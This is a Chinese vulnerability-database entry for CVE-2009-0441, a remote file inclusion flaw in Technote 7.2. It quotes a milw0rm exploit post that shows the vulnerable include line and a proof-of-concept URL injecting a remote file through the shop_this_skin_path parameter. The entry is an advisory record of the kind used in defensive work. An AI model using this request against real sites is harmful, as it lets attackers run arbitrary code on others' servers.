https://www.exploit-db.com/exploits/7965
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-209
Technote 'shop_this_skin_path' Parameter 远程文件包含漏洞






漏洞ID | 1117334 | 漏洞类型 | 代码注入 |
发布时间 | 2009-02-03 | 更新时间 | 2009-03-06 |
![]() |
CVE-2009-0441 | ![]() |
CNNVD-200902-209 |
漏洞平台 | PHP | CVSS评分 | 6.8 |
|漏洞来源
|漏洞详情
Technote是韩国Technote公司开发的基于PHP的网站开发工具。Technote7.2版本中的skin_shop/standard/2_view_body/body_default.php存在PHP远程文件包含漏洞。当register_globals被激活时,远程攻击者可以借助shop_this_skin_path参数中的一个URL,执行任意的PHP代码。此漏洞不同于CVE-2008-4138。
|漏洞EXP
TECHNOTE 7.2 (08.09.25) Remote File Inclusion Vulnerability
bY make0day@gmail.com
/*************************
TECHNOTE (VERSION 7.2 (08.09.25))is bulletin board system of Korea.
It is freely available for all platforms that supports PHP and MySQL.
But I find Remote File Inclusion vulnerability.
Here is the details:
**************************/
TEST ON VERSION TECHNOTE 7.2 (08.09.25)
Download : http://www.technote.co.kr/
/***************************
Remote File Inclusion Vulnerability
/body_default.php
if($GOODS['gs_input']) include "$shop_this_skin_path/2_view_body/include/form_option.php";
//File Include
*************************/
poc:
http://[site]/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=[RFI]
# milw0rm.com [2009-02-03]
|参考资料
来源:BID
名称:33592
链接:http://www.securityfocus.com/bid/33592
来源:MILW0RM
名称:7965
链接:http://www.milw0rm.com/exploits/7965
来源:SECUNIA
名称:33732
链接:http://secunia.com/advisories/33732
来源:OSVDB
名称:51740
链接:http://osvdb.org/51740
检索漏洞
开始时间
结束时间